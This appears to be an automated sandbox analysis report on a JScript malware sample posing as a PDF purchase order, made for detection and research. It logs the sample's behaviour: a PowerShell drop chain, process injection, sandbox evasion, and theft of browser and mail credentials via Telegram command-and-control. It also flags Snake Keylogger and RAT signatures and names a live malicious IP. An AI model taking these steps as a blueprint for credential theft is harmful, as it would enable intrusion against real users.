                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 595515Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 595406Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 595297Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 595187Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 595078Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 594968Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 594859Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 594749Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 594640Jump to behavior
                  Source: powershell.exe, 00000008.00000002.1444855858.000001DE770D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: wscript.exe, 00000000.00000003.1454191109.00000262062E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1456833149.00000262062E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1464059045.0000026208468000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1371839650.0000026208468000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1462474293.00000262062E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: powershell.exe, 00000008.00000002.1444855858.000001DE770D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                  Source: x.exe, 0000000A.00000002.1431442252.0000000000EF3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: wscript.exe, 00000000.00000002.1464059045.0000026208430000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW06/
                  Source: x.exe, 0000000B.00000002.2536399101.0000000000F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll$
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_06849668 LdrInitializeThunk,11_2_06849668
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\System32\wscript.exeNetwork Connect: 176.65.144.3 80Jump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Users\user\AppData\Local\Temp\x.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RUNPEE.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 0000000B.00000002.2538337454.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 10.2.x.exe.44695b0.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.x.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.x.exe.2c85409.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.x.exe.2c85409.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.x.exe.2c89c50.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.x.exe.2c89c50.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.x.exe.44695b0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.1437008178.0000000004409000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2532782484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1435246368.0000000002C85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1437008178.0000000004469000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: x.exe PID: 8060, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: x.exe PID: 2424, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 10.2.x.exe.44695b0.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.x.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.x.exe.2c85409.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.x.exe.2c85409.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.x.exe.2c89c50.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.x.exe.2c89c50.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.x.exe.44695b0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.1437008178.0000000004409000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2532782484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1435246368.0000000002C85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1437008178.0000000004469000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: x.exe PID: 8060, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: x.exe PID: 2424, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Yara matchFile source: 10.2.x.exe.44695b0.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.x.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.x.exe.2c85409.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.x.exe.2c85409.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.x.exe.2c89c50.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.x.exe.2c89c50.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.x.exe.44695b0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.1437008178.0000000004409000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2532782484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1435246368.0000000002C85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1437008178.0000000004469000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2538337454.0000000002CF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: x.exe PID: 8060, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: x.exe PID: 2424, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 0000000B.00000002.2538337454.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 10.2.x.exe.44695b0.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.x.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.x.exe.2c85409.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.x.exe.2c85409.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.x.exe.2c89c50.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.x.exe.2c89c50.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.x.exe.44695b0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.1437008178.0000000004409000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2532782484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1435246368.0000000002C85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1437008178.0000000004469000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: x.exe PID: 8060, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: x.exe PID: 2424, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 10.2.x.exe.44695b0.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.x.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.x.exe.2c85409.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.x.exe.2c85409.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.x.exe.2c89c50.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.x.exe.2c89c50.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.x.exe.44695b0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.1437008178.0000000004409000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2532782484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1435246368.0000000002C85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1437008178.0000000004469000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: x.exe PID: 8060, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: x.exe PID: 2424, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information52
                  Scripting                  		Valid Accounts1
                  Exploitation for Client Execution                  		52
                  Scripting                  		1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		1
                  File and Directory Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Web Service                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts2
                  PowerShell                  		1
                  DLL Side-Loading                  		211
                  Process Injection                  		1
                  Deobfuscate/Decode Files or Information                  		LSASS Memory13
                  System Information Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		13
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
                  Obfuscated Files or Information                  		Security Account Manager1
                  Security Software Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		11
                  Encrypted Channel                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Software Packing                  		NTDS1
                  Process Discovery                  		Distributed Component Object ModelInput Capture3
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Timestomp                  		LSA Secrets51
                  Virtualization/Sandbox Evasion                  		SSHKeylogging24
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading                  		Cached Domain Credentials1
                  Application Window Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Masquerading                  		DCSync1
                  System Network Configuration Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job51
                  Virtualization/Sandbox Evasion                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt211
                  Process Injection                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1637032 Sample: PO-2513203-PDF.js Startdate: 13/03/2025 Architecture: WINDOWS Score: 100 34 reallyfreegeoip.org 2->34 36 api.telegram.org 2->36 38 2 other IPs or domains 2->38 48 Suricata IDS alerts for network traffic 2->48 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 58 12 other signatures 2->58 9 wscript.exe 1 16 2->9         started        signatures3 54 Tries to detect the country of the analysis system (by using the IP) 34->54 56 Uses the Telegram API (likely for C&C communication) 36->56 process4 dnsIp5 46 176.65.144.3, 49717, 49721, 80 PALTEL-ASPALTELAutonomousSystemPS Germany 9->46 30 C:\Temp\WTRTRWFSHS.ps1, ASCII 9->30 dropped 68 System process connects to network (likely due to code injection or exploit) 9->68 70 JScript performs obfuscated calls to suspicious functions 9->70 72 Wscript starts Powershell (via cmd or directly) 9->72 74 2 other signatures 9->74 14 powershell.exe 13 9->14         started        file6 signatures7 process8 file9 32 C:\Users\user\AppData\Local\Temp\x.exe, PE32 14->32 dropped 76 Found suspicious powershell code related to unpacking or dynamic code loading 14->76 78 Powershell drops PE file 14->78 18 x.exe 15 4 14->18         started        22 conhost.exe 14->22         started        signatures10 process11 file12 28 C:\Users\user\AppData\Local\Temp\RUNPEE.dll, PE32 18->28 dropped 60 Antivirus detection for dropped file 18->60 62 Injects a PE file into a foreign processes 18->62 24 x.exe 2 18->24         started        signatures13 process14 dnsIp15 40 checkip.dyndns.com 132.226.247.73, 49725, 49728, 49730 UTMEMUS United States 24->40 42 api.telegram.org 149.154.167.220, 443, 49742 TELEGRAMRU United Kingdom 24->42 44 reallyfreegeoip.org 104.21.112.1, 443, 49726, 49727 CLOUDFLARENETUS United States 24->44 64 Tries to steal Mail credentials (via file / registry access) 24->64 66 Tries to harvest and steal browser information (history, passwords, etc) 24->66 signatures16

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.